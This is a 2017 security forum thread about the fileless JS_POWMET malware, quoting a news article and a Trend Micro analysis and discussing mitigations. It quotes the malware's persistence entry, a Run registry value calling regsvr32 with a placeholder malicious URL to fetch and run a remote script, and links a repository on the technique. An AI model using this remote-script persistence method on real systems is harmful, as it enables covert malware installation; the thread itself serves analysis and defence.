JS_POWMET malware is 100% fileless, from infection to payload

itman · Aug 2, 2017

A newly observed Windows malware called JS_POWMET features an end-to-end fileless infection chain, installing itself without a trace on the hard drive by compromising an autostart registry procedure.

Such discoveries are rare, explains Trend Micro in a Wednesday blog post, because most fileless malware programs are technically only fileless when first infecting a user's system. Upon actually executing the main malicious payload, they typically end up themselves, the post continues. But not JS_POWMET, which leaves no evidence of on the machine itself, making it difficult for researchers to analyze it.

In its blog post, Trend Micro describes how JS_POWMET is downloaded as an XML file with malicious JavaScript, via an autostart registry entry:

"In this method, a URL was given to regsvr32 [the Microsoft Register Server] as a parameter, which will make regsvr32 capable of fetching the file... found on the URL. Due to this routine, regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system. In particular, whenever the affected machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server," the blog post states.
Click to expand...

https://www.scmagazine.com/search/Trend Micro/

itman · Aug 2, 2017

Does the regsrv32 command line options look familiar folks?

Although the exact method of arrival is still not certain, it is likely that the trojan is downloaded by users that visit malicious sites, or as a file that is dropped by other malware. What is clear about this malware is that the following registry has already been changed by the time it is downloaded into the system.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”
Click to expand...

http://blog.trendmicro.com/trendlab...e/look-js_powmet-completely-fileless-malware/

Sordid · Aug 2, 2017

https://github.com/subTee/SCTPersistence

NormanF · Aug 3, 2017

Culprit is Powershell. Disable it or remove it to mitigate fileless malware attacks.

guest · Aug 3, 2017

NormanF said: ↑

Culprit is Powershell. Disable it or remove it to mitigate fileless malware attacks.
Click to expand...

there is several techniques to load powershell scripts without powershell.exe.
This malware could be modified to do it.

itman · Aug 3, 2017

You stop malware like this by using a security solution that monitors what is written to registry run and run once keys. Anything after that point is a losing effort.

EASTER · Aug 3, 2017

Sordid said: ↑

https://github.com/subTee/SCTPersistence
Click to expand...

hey heh

Thanks for Com reference tester and link. Windows is such a playland.

Log in or Sign up

JS_POWMET malware is 100% fileless, from infection to payload

itman Registered Member

itman Registered Member

Sordid Registered Member

NormanF Registered Member

guest Guest

itman Registered Member

EASTER Registered Member

Log in or Sign up

JS_POWMET malware is 100% fileless, from infection to payload

itman Registered Member

itman Registered Member

Sordid Registered Member

NormanF Registered Member

guest Guest

itman Registered Member

EASTER Registered Member

Useful Searches